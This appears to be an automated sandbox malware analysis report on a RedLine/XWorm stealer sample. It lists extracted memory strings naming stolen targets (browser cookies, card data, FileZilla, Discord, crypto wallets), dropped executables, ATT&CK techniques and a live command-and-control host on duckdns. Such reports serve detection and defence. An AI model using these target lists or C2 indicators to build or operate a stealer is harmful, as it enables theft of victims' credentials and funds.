                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: powershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                        Source: Yara matchFile source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED
                        Yara detected XWorm
                        Source: Yara matchFile source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Metin.exe PID: 7184, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		OS Credential Dumping1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        Scheduled Task/Job                        		11
                        Process Injection                        		11
                        Deobfuscate/Decode Files or Information                        		LSASS Memory33
                        System Information Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		1
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts12
                        Command and Scripting Interpreter                        		21
                        Registry Run Keys / Startup Folder                        		1
                        Scheduled Task/Job                        		1
                        Obfuscated Files or Information                        		Security Account Manager541
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job                        		Login Hook21
                        Registry Run Keys / Startup Folder                        		2
                        Software Packing                        		NTDS1
                        Process Discovery                        		Distributed Component Object ModelInput Capture3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        PowerShell                        		Network Logon ScriptNetwork Logon Script1
                        Timestomp                        		LSA Secrets151
                        Virtualization/Sandbox Evasion                        		SSHKeylogging23
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Masquerading                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                        Virtualization/Sandbox Evasion                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571409 Sample: f5ATZ1i5CU.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 57 duclog23.duckdns.org 2->57 59 ip-api.com 2->59 61 bg.microsoft.map.fastly.net 2->61 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 75 15 other signatures 2->75 9 f5ATZ1i5CU.exe 3 2->9         started        13 Chrome.exe 2->13         started        15 Chrome.exe 2->15         started        17 Chrome.exe 2->17         started        signatures3 73 Uses dynamic DNS services 57->73 process4 file5 53 C:\Users\user\AppData\Roaming\Metin.exe, PE32 9->53 dropped 55 C:\Users\user\AppData\Roaming\M2.exe, PE32 9->55 dropped 91 Found many strings related to Crypto-Wallets (likely being stolen) 9->91 93 Encrypted powershell cmdline option found 9->93 95 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->95 19 Metin.exe 15 5 9->19         started        24 M2.exe 15 3 9->24         started        26 powershell.exe 23 9->26         started        97 Antivirus detection for dropped file 13->97 99 Multi AV Scanner detection for dropped file 13->99 101 Machine Learning detection for dropped file 13->101 signatures6 process7 dnsIp8 63 ip-api.com 208.95.112.1, 49711, 80 TUT-ASUS United States 19->63 51 C:\Users\user\AppData\Roaming\Chrome.exe, PE32 19->51 dropped 77 Antivirus detection for dropped file 19->77 79 Multi AV Scanner detection for dropped file 19->79 81 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->81 89 5 other signatures 19->89 28 powershell.exe 23 19->28         started        31 powershell.exe 19->31         started        33 powershell.exe 19->33         started        39 2 other processes 19->39 65 duclog23.duckdns.org 192.169.69.26, 37552, 49704, 49740 WOWUS United States 24->65 83 Machine Learning detection for dropped file 24->83 35 conhost.exe 24->35         started        85 Found many strings related to Crypto-Wallets (likely being stolen) 26->85 87 Loading BitLocker PowerShell Module 26->87 37 conhost.exe 26->37         started        file9 signatures10 process11 signatures12 103 Loading BitLocker PowerShell Module 28->103 41 conhost.exe 28->41         started        43 conhost.exe 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 39->47         started        49 conhost.exe 39->49         started        process13

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        f5ATZ1i5CU.exe79%ReversingLabsWin32.Ransomware.RedLine
                        f5ATZ1i5CU.exe100%AviraTR/Dropper.Gen
                        f5ATZ1i5CU.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Metin.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\user\AppData\Roaming\Chrome.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\user\AppData\Roaming\M2.exe100%AviraHEUR/AGEN.1305500
                        C:\Users\user\AppData\Roaming\Metin.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Chrome.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\M2.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Chrome.exe96%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Roaming\M2.exe89%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                        C:\Users\user\AppData\Roaming\Metin.exe96%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://duclog23.duckdns.org:37552100%Avira URL Cloudmalware
                        http://crl.mic0%Avira URL Cloudsafe
                        http://www.microsoft.co$0%Avira URL Cloudsafe
                        duclog23.duckdns.org:37552100%Avira URL Cloudmalware
                        http://crl.m90%Avira URL Cloudsafe
                        http://duclog23.duckdns.org:37552/100%Avira URL Cloudmalware
                        http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                        http://duclog23.duckdns.org100%Avira URL Cloudmalware
                        duclog23.duckdns.org100%Avira URL Cloudmalware
                        http://crl.m20%Avira URL Cloudsafe
                        http://www.microsoft.cos0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.214.172
                        		truefalse
                          		high
                          duclog23.duckdns.org
                          		192.169.69.26
                          		truetrue
                            		unknown
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://duclog23.duckdns.org:37552/true
                              • Avira URL Cloud: malware
                              		unknown
                              duclog23.duckdns.orgtrue
                              • Avira URL Cloud: malware
                              		unknown
                              duclog23.duckdns.org:37552true
                              • Avira URL Cloud: malware
                              		unknown
                              http://ip-api.com/line/?fields=hostingfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://tempuri.org/Endpoint/CheckConnectLRM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXM2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.microsoft.copowershell.exe, 0000000E.00000002.1471926630.00000251699EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/envelope/M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore6powershell.exe, 00000013.00000002.1645150628.0000028ACAB91000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Endpoint/EnvironmentSettingsLRM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://duclog23.duckdns.org:37552M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://tempuri.org/Endpoint/VerifyUpdateResponseM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Endpoint/SetEnvironmentResponseM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.ipify.orgcookies//settinString.Removegf5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.drfalse
                                                      		high
                                                      http://tempuri.org/Endpoint/GetUpdatesLRM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1315390829.0000000005441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.m2powershell.exe, 00000011.00000002.1610201405.0000022EB86D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://tempuri.org/Endpoint/VerifyUpdateLRM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1458473346.000002511007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1587200548.0000022EAFF96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1759036468.0000028ADAC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.m9powershell.exe, 00000011.00000002.1611877775.0000022EB877B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://ip-api.comMetin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Endpoint/M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://tempuri.org/0M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.micft.cMicRosofpowershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1315390829.0000000005441000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022E9FF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACAB91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472CEC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.microsoft.co$powershell.exe, 00000002.00000002.1314444524.00000000034AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ipinfo.io/ip%appdata%f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.drfalse
                                                                          		high
                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1458473346.000002511007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1587200548.0000022EAFF96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1759036468.0000028ADAC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1315390829.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.000002510022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022EA01DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACADB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousM2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Endpoint/CheckConnectResponseM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.drfalse
                                                                                        		high
                                                                                        http://crl.micpowershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://contoso.com/Iconpowershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://duclog23.duckdns.orgM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://tempuri.org/Endpoint/CheckConnectM2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Endpoint/SetEnvironmentLRM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingM2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://tempuri.org/Endpoint/GetUpdatesResponseM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1315390829.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.000002510022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022EA01DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACADB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.microsoft.cospowershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseM2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
